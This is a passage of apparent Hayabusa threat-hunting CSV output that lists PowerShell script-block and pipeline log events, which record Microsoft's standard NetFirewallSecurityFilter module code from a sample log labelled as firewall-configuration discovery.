[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, 